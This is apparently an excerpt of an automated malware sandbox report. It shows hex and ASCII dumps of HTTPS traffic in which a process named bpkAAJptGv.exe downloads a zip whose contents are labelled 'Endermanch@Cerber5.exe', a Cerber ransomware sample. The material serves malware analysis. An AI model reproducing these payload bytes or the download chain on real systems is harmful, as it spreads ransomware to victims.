                                                                                                                                                            2022-09-29 12:45:27 UTC36625INData Raw: f8 b0 d5 1c 53 18 42 72 1b 8d 75 4f e1 83 24 11 91 fa d5 fe eb 08 7a 35 54 87 f9 cd 00 86 5b 3b af f3 46 cf dd a2 77 bb 08 01 67 d3 65 5e 47 18 ae 12 37 71 b4 b1 f2 71 07 02 e7 69 6d 09 d6 27 d1 8c f6 80 8c 91 81 07 ec db 9f cb ca ae 01 0f eb 4c 6b 09 0e ec 1d 70 87 47 d7 ce cd 58 02 99 d3 16 d1 c8 07 4b 77 ff a6 7a 2e e9 29 fa 59 9c da 97 41 52 2c a7 db 7f a0 6e 1e f3 43 6f ad 3c ca e7 07 8f 0a 53 dd dc 82 19 61 ed b8 e7 df 1c 8d df eb 7c 81 55 af 5c c5 ad 8d a5 83 0c 1a fb 66 5a 85 a2 90 96 09 84 91 96 96 f3 c0 41 ac 53 34 06 81 ff 00 89 2b 45 15 04 ea 0c 93 2a 0e f7 8f 59 ab d3 10 8a 46 35 da a4 1c c0 16 62 ab 75 5b a7 c3 01 9e 8a 54 3b 07 ef 8f d9 1d d3 6c ea 3e d7 82 61 fa e0 9b ad 7d 8b a7 ba 53 03 5a 97 22 8b 99 f1 f1 15 8f 82 a1 33 28 45 4d 40 ed
                                                                                                                                                            Data Ascii: SBruO$z5T[;Fwge^G7qqim'LkpGXKwz.)YAR,nCo<Sa|U\fZAS4+E*YF5bu[T;l>a}SZ"3(EM@
                                                                                                                                                            2022-09-29 12:45:27 UTC36641INData Raw: 6a 0c 62 e2 bb 95 c5 7e 3e b1 87 31 c2 80 06 39 f2 e2 48 6e 7d bf b8 0e 8a 6b e4 14 93 60 14 94 cf 29 eb 66 c0 d9 59 c5 50 c9 b4 74 90 d8 77 fc b3 34 27 13 3b b9 ce 02 dd 0c 34 ee 6e 21 11 9b c5 72 1e c4 2d af 70 80 4d 96 35 cc 25 c2 d2 13 d6 5c 22 4a 97 c7 e5 51 4e d5 33 24 41 7d bc 95 81 85 be d0 1f 6a 8f b6 d1 e7 f3 33 8f 0c 79 ad db 9b c7 cc 26 41 7a 78 a3 ad 26 8d 42 5c e5 31 24 fe e8 1f ee 84 b4 f3 71 2b 8e 75 37 c9 cd 1a 68 b7 83 c8 e3 a5 32 fc 23 15 74 61 e0 88 a2 49 40 8d 86 e1 1d 32 93 31 39 99 65 ea 6a de 91 b0 aa c6 28 56 cf 33 6e e6 c6 9c bb f7 03 e3 c4 21 48 72 90 c8 89 1a 51 a3 4f 64 8f 7c e6 50 4f a6 77 d1 0e f8 c0 5c a9 41 92 e5 c3 84 c8 a1 64 28 c7 a4 91 65 27 65 66 db be 5d ab 7b f2 aa cd fd 10 98 38 59 39 17 e7 92 0a 58 50 74 4b 30 ce
                                                                                                                                                            Data Ascii: jb~>19Hn}k`)fYPtw4';4n!r-pM5%\"JQN3$A}j3y&Azx&B\1$q+u7h2#taI@219ej(V3n!HrQOd|POw\Ad(e'ef]{8Y9XPtK0
                                                                                                                                                            2022-09-29 12:45:27 UTC36657INData Raw: c8 23 d5 1e c9 d8 85 54 0a 57 66 50 aa 3f fb 24 fc 14 56 0c b4 11 e8 2c 44 a6 05 61 61 19 26 63 25 40 04 e4 ae ba 99 35 1c 20 a2 e0 43 84 35 d8 9e 64 ac d7 e1 1c 6e 48 ba 98 b6 1e dd 04 b7 89 97 f1 d0 19 28 d3 09 9a 89 89 51 f5 1a 49 c8 40 8c 1b ce 4c 77 93 74 51 cb fd 96 af c5 3b a6 3e e7 f0 c5 b2 7b 1f ab cf 94 88 1a ac ac 0c d0 86 04 05 22 c0 8d 4c 90 7d d9 b8 0b 40 bd f8 6d d1 15 29 49 47 b0 fb 15 39 d3 0b 98 82 e0 bc 77 20 02 5f 95 4d 4d 64 30 de ef d0 c9 ef 46 cc b9 0b 27 2e 8b 2c 11 2d f0 81 d8 a1 58 35 5e 72 0c 65 35 13 73 f3 8e e5 be c1 53 a3 60 05 6d 16 3a 2d 5f 89 d1 71 3a 38 f1 8b 2f bb f7 1a b0 c7 2b fc a5 b8 ea 0b de 1e 8b c4 82 9b 97 c3 ca e2 71 40 55 9b c3 21 99 bc 0e fa 58 f4 29 69 78 7e 51 fd f5 fb a5 29 7f 04 29 41 07 93 72 ba 7d c6 cb
                                                                                                                                                            Data Ascii: #TWfP?$V,Daa&c%@5 C5dnH(QI@LwtQ;>{"L}@m)IG9w _MMd0F'.,-X5^re5sS`m:-_q:8/+q@U!X)ix~Q))Ar}
                                                                                                                                                            2022-09-29 12:45:27 UTC36673INData Raw: 27 86 35 90 e4 2b 24 75 0e b7 66 d8 39 ef fd a4 94 22 2f 2c 8c 3a de a6 4e 2a 2a b2 d7 3a 95 ed 04 4d a8 08 ac b6 38 b0 24 1c 7b ef 26 aa 94 49 84 f3 59 d1 d4 fc 6b b3 48 37 25 e4 b0 ab 7e e4 01 33 de d2 3a bf b3 a4 cc b7 03 f4 7b 6f de 4a a0 dd 63 44 83 25 5d 98 f6 df 1f 3d 1e 0c 32 7b bc d8 04 ac e1 92 32 9a a6 ed 61 6b 92 ff 75 3b 77 93 c4 50 b5 15 4b c0 be 59 79 15 f2 eb 9a ee 78 6b cc df 8a d8 63 94 be 49 34 c9 a2 d9 a2 f2 e8 57 8f 76 78 92 3e 65 c0 57 90 88 3b 5b 85 e0 4a 58 33 4e d6 8b 2d 6d 6e 98 47 35 b6 6f 74 bd d8 35 4e 07 0e 70 0d 7b 24 a6 9c 37 2d cf a2 05 5e c4 92 13 6f ae 6e e5 47 65 dd c5 22 52 5b 11 81 7d c5 9c 54 a5 6e 7f 9c db d9 82 58 1b 92 70 34 8a fb cb fb 5f 97 e1 0f e3 29 34 43 d3 c6 9a 6c d4 f1 e5 bd 9d 7f ef 05 1e 93 72 32 c8 b1
                                                                                                                                                            Data Ascii: '5+$uf9"/,:N**:M8${&IYkH7%~3:{oJcD%]=2{2aku;wPKYyxkcI4Wvx>eW;[JX3N-mnG5ot5Np{$7-^onGe"R[}TnXp4_)4Clr2
                                                                                                                                                            2022-09-29 12:45:27 UTC36689INData Raw: 5c 90 6d ab b5 62 3c 7e 82 61 78 d7 cf db 04 e5 b1 7b ae 08 ed 0b 50 f6 13 9d bc 38 4d e2 24 7c 74 8b cb 29 58 c4 9f a2 f3 58 ed e3 6d 1c 81 e6 37 4d a5 97 f3 f3 92 81 24 0a 01 79 ac d6 a5 8f 0f 6a 61 77 bf c0 09 51 af 46 b3 86 73 40 9a de 4d 2c 36 01 2e d7 04 7b 09 0f ae df a4 b2 41 cc 85 48 87 29 fb 04 aa 41 19 fb 13 ac 25 af 3c b1 0f 22 e8 98 75 4d 3f ef 68 41 db 28 be e6 d7 9c 25 a3 12 07 ae 35 0d 34 92 3c 0d 80 9b b8 e8 41 da f0 12 28 50 32 98 2f 1a ba 13 cc 60 8f 74 35 26 2c a9 25 62 01 b7 6f 70 96 55 9f 99 54 72 16 6c 4b 45 a1 b2 07 7d a0 be 31 50 fa 1a cb cd 58 83 42 6f be 9e 9c db ec 7e 3d 35 05 8f d4 ac 6e 66 ce 7c 04 23 e3 81 28 b3 00 30 8a 73 35 79 bf e1 ef d4 b4 b2 c5 df ee 32 86 12 4a ac 57 64 44 04 6c 46 72 73 a3 54 67 ee ea 58 2b fe 56 c3
                                                                                                                                                            Data Ascii: \mb<~ax{P8M$|t)XXm7M$yjawQFs@M,6.{AH)A%<"uM?hA(%54<A(P2/`t5&,%bopUTrlKE}1PXBo~=5nf|#(0s5y2JWdDlFrsTgX+V
                                                                                                                                                            2022-09-29 12:45:27 UTC36705INData Raw: 7e 62 ff dc d2 5a 80 83 da a9 b6 8d 84 44 64 3f f5 97 1b 56 29 31 23 dc ba af 87 65 16 aa 3c e7 cf 2b a4 45 26 5f bf 9d 4d 68 5d aa 04 f2 44 44 6c e2 99 56 cc 4c e5 e2 b8 bd 2b 10 3e a6 31 fb ab c6 34 95 e6 24 c2 90 3d cd a2 b6 04 4c c6 af e0 8b f7 9c 66 c4 76 f2 87 75 03 e7 8a e4 fa 89 5e 37 98 52 ce a1 fb d5 9b db 52 b1 b7 ff 20 5b 3d 36 4d ac 8b ed b0 0a 5c b8 b4 55 18 c4 7a de b7 41 ed 39 7a fa 1f ed f1 04 65 a7 1d f7 d3 c3 ef 22 d1 2f 00 8b 9d 81 8b 4e dc 38 f1 b6 bb 78 9d 78 c1 36 29 91 35 4c bd c8 a3 cf 85 18 7f 6b 25 25 58 ae 3e 1f cc f4 ca ea 50 1b 15 06 e9 b8 81 06 53 d6 85 94 67 4d a4 8d e1 1e 0d e0 a5 d0 7e f3 c8 d9 6d c1 e1 76 b1 56 1c e5 e7 68 7c 7e 93 75 41 0b 6e 4d 77 7d 9b 01 ad 47 0e 76 da ed 9a 32 06 c6 c5 64 8d 0f 8f a5 5b 00 31 76 de
                                                                                                                                                            Data Ascii: ~bZDd?V)1#e<+E&_Mh]DDlVL+>14$=Lfvu^7RR [=6M\UzA9ze"/N8xx6)5Lk%%X>PSgM~mvVh|~uAnMw}Gv2d[1v
                                                                                                                                                            2022-09-29 12:45:27 UTC36721INData Raw: e9 92 c9 a0 89 61 db e2 44 e6 9e fb 4b fd ff 47 36 e0 c3 ea de 3f f4 3e 13 ca 9d 3b a2 bd 99 15 a6 33 bb a4 74 c6 30 48 79 10 1c 3d 8e 61 ea 0c b7 9b f6 4b 13 56 5f 3f 0e 8f 2e 81 24 59 8a 4a 4a 08 f1 0d d7 ad 29 01 17 3e 2f d4 7c b1 5b 76 05 b0 13 10 90 2f e2 fe c5 78 27 52 1c 3b 72 c9 00 fa a0 c1 85 71 21 07 28 c8 86 63 48 16 ac 7c ae ec c5 e8 dc 49 9e 9d 50 d5 05 32 f7 ef 65 a5 e3 f8 a3 26 fc f4 47 8e 62 07 e0 2b 9c 7e 80 63 85 c6 91 6e 21 ab d7 52 cb a5 c2 5e 5e 44 b5 cc cc a3 af b5 77 aa 53 1e 91 eb 33 81 03 3d b3 f0 6e 17 24 03 15 12 0a 3e de 9d d0 4a e2 fd 0b f6 6b c9 cd 73 b7 14 1c cb 68 53 2e 2c dd af 30 f5 87 8f 3e 5e c7 ee 1a 5b 31 97 74 4d a4 25 33 88 28 d1 fa 65 9f 9b 96 43 5f 5d a3 15 ab 62 f7 0e c7 85 77 d2 eb 3d 30 ca b8 ee fb 07 46 0f b9
                                                                                                                                                            Data Ascii: aDKG6?>;3t0Hy=aKV_?.$YJJ)>/|[v/x'R;rq!(cH|IP2e&Gb+~cn!R^^DwS3=n$>JkshS.,0>^[1tM%3(eC_]bw=0F
                                                                                                                                                            2022-09-29 12:45:27 UTC36737INData Raw: 63 51 dc 09 b5 22 7c 43 fe ce da 1a 23 a5 9a 2e 40 4c 7a f3 ea b0 6f 0f 76 b7 10 60 b2 41 1d 8b 36 2a fe 0e 98 e4 b0 38 4d fa fb d6 d2 2e 9f 85 6c 73 e6 73 91 d0 3b 3a 0b aa 48 83 5b fb 71 88 7f c1 f5 ea f2 f3 fe fd 15 c9 6c dc d9 3b b8 d0 bb ca cd 94 91 33 9b fb af 33 f1 2b a8 97 32 8d f7 2d 5e 5b 1b 9a b0 85 e6 b9 6a 3d b2 a2 62 83 71 2e ae ae bd 40 67 59 2b 98 25 4e 88 8f b5 e5 16 bc fc 1e 16 a6 5b 38 c5 2a 47 b7 a3 33 b7 7d 64 a0 3e 6e 9b 9f ab 7f d3 96 91 b1 12 39 2e 73 f8 60 66 79 30 cd eb 48 6f 67 a5 35 db f8 57 a4 7d fe 16 62 ea 78 0a 21 72 7a 3f 5f b1 bd 66 06 3e 3d 20 ff cd 35 e1 1e ac bc 72 33 56 41 f3 dc 3f 71 16 24 bc 5c ee 3e 94 40 17 8a e9 37 e8 4b d6 bd 80 a0 fc fe 90 69 2b 7d 42 07 48 49 ff ed f4 07 cd 62 c7 6e e5 10 59 30 33 f4 ef fc 67
                                                                                                                                                            Data Ascii: cQ"|C#.@Lzov`A6*8M.lss;:H[ql;33+2-^[j=bq.@gY+%N[8*G3}d>n9.s`fy0Hog5W}bx!rz?_f>= 5r3VA?q$\>@7Ki+}BHIbnY03g
                                                                                                                                                            2022-09-29 12:45:27 UTC36753INData Raw: 1a 36 7d 24 6a f6 86 77 e5 84 da 5f 76 81 57 8d c4 4b c4 02 1d 40 4b 80 79 05 99 f7 53 94 cf 9c 26 9a eb b9 a5 90 ab 7c 5d f6 11 67 f8 ff a5 f1 47 7c ca 17 f4 1f b8 53 71 39 26 91 2d 00 0c 76 38 0f 9a e6 68 e7 5d fb 57 aa 24 33 6d 6b dd d2 78 72 29 df ef dd fe ae cf e3 73 79 df ab 7d 01 29 2f 22 e4 a7 87 98 84 96 c6 48 23 75 75 c7 23 f9 30 c4 67 d9 57 5b 82 73 16 c0 af 0f 09 c2 72 67 a2 2e 30 1d 6e 26 8d 6d 1f b2 97 ff f8 10 d8 99 f2 32 e8 7f 88 8b 68 3f fd 70 ba f3 98 f3 e0 65 46 12 fc 24 df c4 49 85 6d 4b 48 b5 cf d9 53 94 4a 7c ea 19 f9 cc 36 da 5c 35 21 f5 a6 4a fb e6 1b da dc 94 9f 7f 78 2c 12 2f 6f 2a 7c 0d a1 ad dd a4 d4 f1 e8 58 09 98 ca bf 8f e0 03 36 22 39 5c 5a 04 41 4b 62 54 82 58 4f 88 d4 2d 15 f2 b1 0a a2 8e a3 54 d7 ff 68 49 69 2f ee c0 04
                                                                                                                                                            Data Ascii: 6}$jw_vWK@KyS&|]gG|Sq9&-v8h]W$3mkxr)sy})/"H#uu#0gW[srg.0n&m2h?peF$ImKHSJ|6\5!Jx,/o*|X6"9\ZAKbTXO-ThIi/
                                                                                                                                                            2022-09-29 12:45:27 UTC36769INData Raw: cb f1 f3 98 00 42 9b 7d 60 41 e3 80 e6 fe 30 bf 58 3d e9 4e 4e e0 23 19 61 b7 06 6a 98 7a 14 3a 9e 83 17 eb a7 71 2e f2 5e 08 33 b1 91 38 24 0c b0 2e 89 6a 20 00 90 61 d1 55 b7 8f fc 87 49 74 5f 09 d1 64 29 0f bd c1 46 76 27 06 d1 e4 bc 99 b1 09 2d 7f fe 6b f9 88 55 90 a0 9c 8b b8 4d 2f 2e 18 44 a4 fd f0 ad 58 a1 99 4b c8 c7 f5 ce ac b2 96 48 9d bb b3 0e 00 8d 34 0b 14 05 c2 3d 90 92 54 2c 39 26 05 c1 88 fb b9 d0 47 b1 fc c6 7e f3 9d ea 80 e5 3c 37 ca df 88 e7 5a 05 04 fb 3e 67 9b 27 ae 5c 9e 74 e6 b1 5d ab ef e0 3c 40 ab 2e 29 c1 9c 78 da 35 7b 5a 97 3b 5b 9a 65 9e f6 a0 e7 7e 1b fc 7f 5d 72 41 31 44 f2 ad cc 95 86 be 98 8f 39 7e 0c 82 54 10 d7 53 4c 93 53 60 33 b5 61 75 d9 5b ff 37 89 06 1b 5e a8 cd af bd 3d bc 7b 56 15 ec f2 e2 7e 08 5d e0 3c 39 00 61
                                                                                                                                                            Data Ascii: B}`A0X=NN#ajz:q.^38$.j aUIt_d)Fv'-kUM/.DXKH4=T,9&G~<7Z>g'\t]<@.)x5{Z;[e~]rA1D9~TSLS`3au[7^={V~]<9a
                                                                                                                                                            2022-09-29 12:45:27 UTC36785INData Raw: 7e 33 34 09 50 24 d0 e6 d6 a1 36 81 c1 72 fb 91 70 6b 6c 46 bd 5f 99 b3 4f 59 6e c6 5d b3 a3 b6 21 eb 93 b2 37 a6 f4 81 21 cf 30 6d ae b6 b7 c7 2b d5 5b ab 0c 0f 65 23 37 f1 66 4c 81 96 10 a2 45 ac b5 97 c2 92 2d 3e 4b 9a d5 a7 35 a6 79 fb fd 8a f7 04 4a e1 a0 16 b8 b2 ad e1 9e 3e a2 06 cc e7 79 19 53 40 3c e2 f7 02 ce b4 f0 7c 2b 84 3c 98 f4 ce 73 6f 21 e0 58 44 e4 ce 43 6b 6c 83 2e 5f 08 5c 3c 40 03 1e 22 37 9d 55 45 46 ab 87 64 ef 0b 85 79 55 a1 86 90 e9 20 4a 8f 42 61 c8 25 cd ae 87 37 7b 12 1f 73 79 f1 54 5c 4b a2 56 b1 fd c3 04 38 69 e7 cf 42 ff 3e 8a 57 a5 2a da c8 23 24 f2 ad 33 2e c2 9a 80 c1 60 99 2d dc 88 be 4a 9f ef 78 7f c9 cf 91 fc f6 94 c7 31 23 25 4f 82 3d ae b3 0e 9c 89 18 ca 8f 1b c4 44 3a 59 3f fd 63 51 33 6f c1 22 ee 59 5f 79 b6 71 b5
                                                                                                                                                            Data Ascii: ~34P$6rpklF_OYn]!7!0m+[e#7fLE->K5yJ>yS@<|+<so!XDCkl._\<@"7UEFdyU JBa%7{syT\KV8iB>W*#$3.`-Jx1#%O=D:Y?cQ3o"Y_yq
                                                                                                                                                            2022-09-29 12:45:27 UTC36801INData Raw: 70 01 32 91 e4 f6 49 e7 63 1a fa 6b 65 06 3f 09 dd fc be 2a c7 3e 18 94 88 f7 ed db ab 06 f2 e1 7a d5 b1 34 15 7d cc e1 7f 1c 3c e2 ad bc 57 87 04 c7 64 99 03 2f f1 c3 c0 c2 84 cc 9f d2 c9 9a e3 0a 70 61 55 e6 fc f8 49 47 8f 3d c2 5b 77 f5 12 9d 36 c5 a4 af a2 e9 75 31 d9 ff 0d fd 81 83 45 bb cd 27 c5 7a a2 4a cb 22 c7 bb 24 a1 96 5a 0d b4 66 ae 55 37 63 4c 3d 04 e8 bd d5 73 45 51 2d 5c e8 a2 66 f3 56 e0 cc 85 43 0b 2e 67 71 37 03 e2 50 2a 52 cc dd 3d 34 7f 62 c2 f0 82 1f bc d7 4d db ad 60 c2 92 39 f4 60 54 80 d1 04 bf b5 c1 61 1a ef 87 36 89 bc 4a de f5 e2 1b 64 35 dc 9b 61 15 0a 9e 7e dc 2d c9 b0 a4 af 90 9e 0c 7d 08 b2 28 c6 1a fc 5b 65 ea 19 61 3c 62 f8 e1 e8 f0 dd 7b 1d 9e 1a fc d2 19 7a 61 00 d6 f6 90 97 78 ee 29 98 ee 50 1c 45 18 dc 6b ed 19 fb af
                                                                                                                                                            Data Ascii: p2Icke?*>z4}<Wd/paUIG=[w6u1E'zJ"$ZfU7cL=sEQ-\fVC.gq7P*R=4bM`9`Ta6Jd5a~-}([ea<b{zax)PEk
                                                                                                                                                            2022-09-29 12:45:27 UTC36817INData Raw: 1f d1 61 ce 84 85 88 45 9a 16 75 1c d4 5a e6 2e 2e ab 28 5c da 67 f9 9e b4 06 df 92 c5 36 42 6d 80 5b 09 7e 44 d1 c7 02 91 45 5f 75 d4 e7 32 c7 8e bb cb c1 b1 11 6d f0 1d 04 22 ca 10 9a b8 f4 2e b5 73 82 0b b8 64 30 50 65 be a1 f1 ba d8 60 84 a0 fe a8 64 e9 06 04 b2 b9 79 52 24 fc e3 b1 63 fe e5 53 c6 26 f9 8b e6 f7 ee 0f d4 a4 26 e1 b3 9b 90 9f bf 47 89 8f c0 e0 62 18 53 d7 98 4d 53 dc 4a ae 4d fb 1f ba 2b 20 1c 73 d1 b0 98 06 50 04 2b 90 35 b3 df cf 72 79 08 64 4a 65 95 e7 65 56 33 f2 8b 1d 8a bb 82 f4 4e 60 77 cc a5 d1 22 7c d8 83 29 1e ed 10 72 60 5f 9f 5a cb 06 56 da 68 ec b5 8f c2 7a fb 03 18 9f af c2 94 14 74 4e c6 b5 24 17 7b ea 33 3a 5d 3f 30 ba d7 69 4b 8c 11 f4 72 ae 32 f2 0c 23 a6 06 99 2b 8a 1a f3 05 8e 0f 08 d2 9f 60 bb 43 15 19 d2 83 f7 7a
                                                                                                                                                            Data Ascii: aEuZ..(\g6Bm[~DE_u2m".sd0Pe`dyR$cS&&GbSMSJM+ sP+5rydJeeV3N`w"|)r`_ZVhztN${3:]?0iKr2#+`Cz


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            13185.199.110.133443192.168.2.649714C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:48 UTC517INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 185620
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "2a6ab7c5316fce8fcdfa21d92de6f495abe9a21496869efff37027ac0d4eb5d5"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 9E7E:A32C:78ED2E:8681D5:6335928B
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:48 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6924-MXP
                                                                                                                                                            X-Cache: HIT
                                                                                                                                                            X-Cache-Hits: 1
                                                                                                                                                            X-Timer: S1664455488.037142,VS0,VE1
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: dfcf40800102382850eebd82209a3e39331aef3a
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:49:48 GMT
                                                                                                                                                            Source-Age: 180
                                                                                                                                                            2022-09-29 12:44:48 UTC518INData Raw: 50 4b 03 04 14 00 01 00 08 00 01 9c f5 4a 57 39 9c 5a 62 d4 02 00 f8 e4 04 00 16 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 43 65 72 62 65 72 35 2e 65 78 65 b3 65 c3 dc f7 40 a4 56 9a af 6a f2 79 cc 2c 79 59 8b af 8c 38 0a 8c 54 10 a7 df ac af 7a 8c 29 fd c4 6e 49 ec 85 d0 b3 ed 8c 20 81 e7 7f fc 7e 72 5c 18 04 0c 93 d2 8e 0f 2e 35 72 7c 8b 97 fc cb 24 10 a0 1e 13 7d 3c 96 80 f9 8a 0c b4 3d 06 97 40 f1 3a 8d c7 b9 1b 60 0c f7 bf c0 c3 dd 3a d6 b5 b1 77 61 f3 44 af 99 7d d7 9a a9 2d 28 38 5c ec bf 85 4f c7 26 7e 99 af ed 48 bf 1f 7e 53 e2 4f 1c 29 93 32 9a 5f d5 7d 8c 9a 1a 45 92 80 a5 6e 26 4a 14 9b 3f f3 10 df ac c9 3b b1 17 e9 99 1c 76 2b 9c f7 83 4d fd bb 4e f3 b4 73 91 2f 63 d7 27 41 25 cc 91 4f 9b 5e 70 c2 ec 61 ad c0 c3 ea e5 8d 28 2b 1d 29 ae f4 f8
                                                                                                                                                            Data Ascii: PKJW9ZbEndermanch@Cerber5.exee@Vjy,yY8Tz)nI ~r\.5r|$}<=@:`:waD}-(8\O&~H~SO)2_}En&J?;v+MNs/c'A%O^pa(+)
                                                                                                                                                            2022-09-29 12:44:48 UTC534INData Raw: ae 88 9a bb 4e 64 0a 40 e9 63 5b 70 4d 14 2b f4 09 30 91 ee b9 1f e8 a5 9b d3 10 70 cf ce 91 d4 fd 05 25 32 49 91 91 62 96 9d 44 56 17 ce 24 76 c0 51 35 7b b5 30 ff 62 32 08 88 3e 6d 17 6f 75 c3 50 77 6d 75 3c 66 c0 75 fc 4d 5d 90 40 ca 09 31 4b a9 85 6c e0 3a 59 46 dd 25 27 69 77 5a 4c 96 8e c0 2a b7 7a b3 ae ef cd 3d d6 7e ce ac a4 8f c0 d5 73 15 03 72 23 09 0a 14 4a a5 ca cb eb 15 c2 dc 2a 53 78 da 66 fb 14 01 3b f1 27 3d 9d a1 b7 f2 78 44 ef 93 76 27 77 d7 82 64 8d b6 ab 3c 16 3f 79 b4 47 9f 9c 0d 4f f3 dd d8 16 36 e5 a1 b9 c3 ea 21 7d 8e 3d 85 43 e5 64 10 d9 cc 4c 54 a4 63 e4 83 3c 9d df 75 5e 90 03 d4 36 c7 c6 4b d1 b8 8c c2 76 2a 28 ab a6 ef c6 60 f0 e5 0d c9 41 fb b0 18 52 7b c1 ff 56 c9 a4 30 ad 89 43 15 dc b8 48 9e 8f 91 60 f1 59 85 c6 20 be c6
                                                                                                                                                            Data Ascii: Nd@c[pM+0p%2IbDV$vQ5{0b2>mouPwmu<fuM]@1Kl:YF%'iwZL*z=~sr#J*Sxf;'=xDv'wd<?yGO6!}=CdLTc<u^6Kv*(`AR{V0CH`Y
                                                                                                                                                            2022-09-29 12:44:48 UTC550INData Raw: 1e 28 da ab d9 c9 dc ab 2b eb 07 f3 05 c0 a5 c1 92 14 76 cd ab 39 d5 ce 11 b9 b4 81 78 0c d2 91 d8 cd b6 65 b9 80 3b 2b b0 f2 6c 0f 69 87 c6 fe 58 2c de dc 4d 59 ad f6 d4 a1 ad 03 c7 5a f5 1f 7a 6f 24 50 bb 54 d0 f6 ba 5e 40 57 3d 7b 2c f6 5d fb 96 43 77 f2 69 7e 9a 71 95 81 10 40 88 af ed d1 5e 7a e6 44 eb ce c4 fc d9 1d 05 04 10 4f 65 1c c7 ac 65 4b 3e 6e 9c 59 cd b4 4c 01 ce 90 07 be 80 a8 1d 11 73 2d c0 4e 93 1d fe 75 68 85 6d 08 56 75 fa 22 12 e1 8f c5 58 05 52 af 73 1e 8f c3 2d 7f e9 9f b1 43 d1 e4 f1 39 e6 4a c7 95 80 fc 2f c8 41 45 56 7f ca e6 74 79 0d 5a b8 b8 d1 74 0b 8e 9a dc 0a cc 18 af 0f 7f 68 41 8d c6 6e 61 3f 46 df f8 32 90 0e f9 63 6b c3 3b 42 e8 77 c6 55 2b a4 d5 3c da 9a dc 8f c1 d4 8c 17 4a 0e 17 91 fb 27 8a 99 0e f1 b7 b7 ad 57 67 77
                                                                                                                                                            Data Ascii: (+v9xe;+liX,MYZzo$PT^@W={,]Cwi~q@^zDOeeK>nYLs-NuhmVu"XRs-C9J/AEVtyZthAna?F2ck;BwU+<J'Wgw
                                                                                                                                                            2022-09-29 12:44:48 UTC566INData Raw: d7 ef cd a6 4d 0d fb 49 c7 e2 d3 a7 ce 85 87 d9 fe bf 2d 91 8e b2 47 c6 0f fd 1a 6c 3b 30 98 8f fe ac 49 c0 e1 3b 34 10 53 a8 d1 e2 63 b7 55 c0 5f 1d c8 b4 dc 8b b0 f8 40 bf 45 89 15 77 3a a6 7a fe 13 2c 9f 09 46 b4 dc be f9 38 bd ba 5a ea 32 ce 6f dc 18 6a a0 b9 f6 59 c4 ac 8d fa 89 09 fd 52 b8 4a 8a 8c 62 76 be ae 7b 4c 7e 60 ee f1 28 37 a2 ee da dc 91 78 65 37 49 c5 0a e2 3a 27 1e 54 96 31 67 8d 0f 88 ec 45 87 be 65 47 39 61 dc 96 f2 ed ac 55 e2 37 e4 d5 aa f0 8f a2 6b 61 37 6a 75 22 50 6e 92 ce 26 bb 5b ce d7 fa 5b 7b d1 6d b0 a7 0d 40 f9 14 4a de 56 6d 84 4f c2 6c 61 65 22 ee 22 bd 38 55 e4 22 b6 d1 46 c6 e6 72 ac eb 36 28 c5 28 dc 36 44 98 78 2f da 18 56 d2 eb 39 4b f2 28 ab 59 19 48 b2 2f 58 f4 2b 7f 51 d7 4e 88 46 d6 da 38 06 a1 d2 74 19 43 a7 62
                                                                                                                                                            Data Ascii: MI-Gl;0I;4ScU_@Ew:z,F8Z2ojYRJbv{L~`(7xe7I:'T1gEeG9aU7ka7ju"Pn&[[{m@JVmOlae""8U"Fr6((6Dx/V9K(YH/X+QNF8tCb
                                                                                                                                                            2022-09-29 12:44:48 UTC582INData Raw: 73 d2 fc 41 ed b5 ab 41 58 95 cf 43 35 8e 03 0e 8a ff 40 12 34 88 23 01 9a 63 71 7e 76 4e 8e dd 5d cc 86 30 93 cb f3 5a 62 2a d3 77 c8 bf 56 42 24 bd 20 53 9e 7e 39 65 10 27 f3 82 70 b8 35 64 5c f8 d9 fa 02 d4 25 ad db 19 f5 6e 9f 2b 61 1e 63 b9 4a 6b f8 a1 2f e5 d5 95 fc 1f b0 87 e5 d0 6f af 05 b7 d9 f3 b5 47 2f ca 0c 0a 99 72 e6 4a 05 53 1d 9c c2 48 82 a4 18 1c 91 21 1e 26 7e 16 14 04 64 cb 48 a3 61 48 cc b1 26 08 02 b4 9b 45 df 31 8c 02 c2 80 7f b5 ca 8b 31 d1 db 1c f5 e1 4f 1e b2 78 86 65 af 4b 37 c4 b5 ba 36 3f c8 06 dd c4 0a 4b b6 f0 24 83 9b af a1 c7 aa c8 13 f2 98 a0 ca 73 1b d0 28 cf f6 e2 e4 4d 20 55 63 af a9 6d e3 6b c9 20 b5 98 4b 8f bc bf 9e ce cf d4 2d 2a 47 28 8b 23 14 14 2b 84 dc c9 30 34 54 f9 25 b5 95 71 b4 47 f9 a9 ad 15 1a 33 4f 0a f4
                                                                                                                                                            Data Ascii: sAAXC5@4#cq~vN]0Zb*wVB$ S~9e'p5d\%n+acJk/oG/rJSH!&~dHaH&E11OxeK76?K$s(M Ucmk K-*G(#+04T%qG3O
